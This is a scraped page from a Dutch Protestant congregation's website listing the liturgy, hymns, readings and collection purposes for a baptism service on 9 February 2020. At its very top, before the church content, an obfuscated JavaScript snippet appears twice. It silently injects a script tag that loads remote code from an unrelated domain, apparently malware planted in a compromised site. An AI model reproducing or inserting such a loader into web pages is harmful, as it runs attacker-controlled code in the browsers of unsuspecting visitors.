;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 februari 2020 9:30 uur - PKN Damwâld
zondag 9 februari 2020
09:30 uur
Koffiedrinken in 't Skûlplak na de dienst

Kerkdienst zondag 9 februari 2020 9:30 uur

Thema: Doopdienst Sven Johannes Vrieling

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Thema:Doopdienst Sven Johannes Vrieling
Mededeling:Koffiedrinken in 't Skûlplak na de dienst
Liturgie
Lied voor de dienst NLB 146 : 1 en 3
Welkomswoord
We zingen: Elb 471 : 1
Stil gebed, Votum en Groet
We zingen: Elb 371 : 1 en 2
Doopformulier .
We zingen: Nlb 348 : 1 en 2
Doop wordt bediend
We zingen: Nlb 415
Gebed
We lezen: Lucas 9 : 57 - 10: 16
We zingen: Nlb 103 : 5 en 7
Preek .
We zingen: Nlb 531 : 1, 2 en 3
Dankgebed en voorbede
Collecte
Slotlied Nlb 913 : 1, 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Catechese en Educatie

Catechese en Educatie - Nederland – Relevant en modern trainingsaanbod
Voor mensen die een taak of ambt uitoefenen in de kerk is het waardevol om te blijven leren, om verder te groeien in hun rol. De Academie van de Protestantse Kerk zorgt hiervoor met een relevant, onderscheidend en modern trainingsaanbod. Zo kunnen (op)nieuw startende ambtsdragers een “blended training” Nieuwe Ambtsdragers doen. Zij krijgen de theorie aangereikt in een interactieve e-learning. In bijeenkomsten is er naast toepassing en verdieping van de theorie volop ruimte voor uitwisseling. Uit reacties van deelnemers blijkt dat deze manier van getraind worden werkt en in een behoefte voorziet. De Academie van de Protestantse Kerk wil graag meer trainingen op deze manier vormgeven. Met deze collecte draagt u hieraan bij

Tweede collecte: Kerk
Uitganscollecte: Kerk